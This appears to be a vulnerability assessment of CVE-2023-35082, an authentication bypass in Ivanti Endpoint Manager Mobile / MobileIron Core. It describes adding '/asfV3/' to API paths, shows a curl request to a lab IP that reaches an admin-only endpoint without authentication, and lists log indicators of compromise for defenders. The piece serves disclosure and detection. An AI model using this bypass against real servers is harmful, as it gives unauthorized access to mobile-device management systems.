An authentication bypass vulnerability in Ivanti EPMM 11.10 and older, allows unauthorized users to access restricted functionality or resources of the application without proper authentication. This vulnerability is unique to CVE-2023-35078 announced earlier.

**Recent assessments:**

**sfewer-r7** at August 03, 2023 9:02am UTC reported:

_Update: August 8, 2023: Ivanti have indicated that CVE-2023-35082 affects all versions of Endpoint Manager Mobile (EPMM) prior to a patch released August 7, 2023. The attacker rating value for CVE-2023-35082 has been increased to reflect the new product versions affected by this vulnerability._

CVE-2023-35082 gives an attacker unauthenticated API access to a vulnerable Ivanti Endpoint Manager Mobile (EPMM) or MobileIron Core target.

An attacker can access the MobileIron Core API unauthenticated, by including `/asfV3/` in the URL path, for example:

c:> curl -k https://192.168.86.103/mifs/asfV3/api/v2/ping

This will successfully call the [ping API endpoint](), which is meant to require authentication from a user with admin role privileges, and the following result is returned:

{“results”:{“apiVersion”:2.0,”vspVersion”:”VSP 11.2.0.0 Build 31 “}}

The `/var/log/httpd/https-access_log` log file on the appliance will show indicators of compromise for entries containing `/mifs/asfV3/api/v2/`in the path and a HTTP response code of 200. For example:

192.168.86.34:61736 – – 2023-07-28–15-24-51 “GET /mifs/asfV3/api/v2/ping HTTP/1.1” 200 68 “-” “curl/8.0.1” 3285

Assessed Attacker Value: 4
Assessed Attacker Value: 4Assessed Attacker Value: 5Read More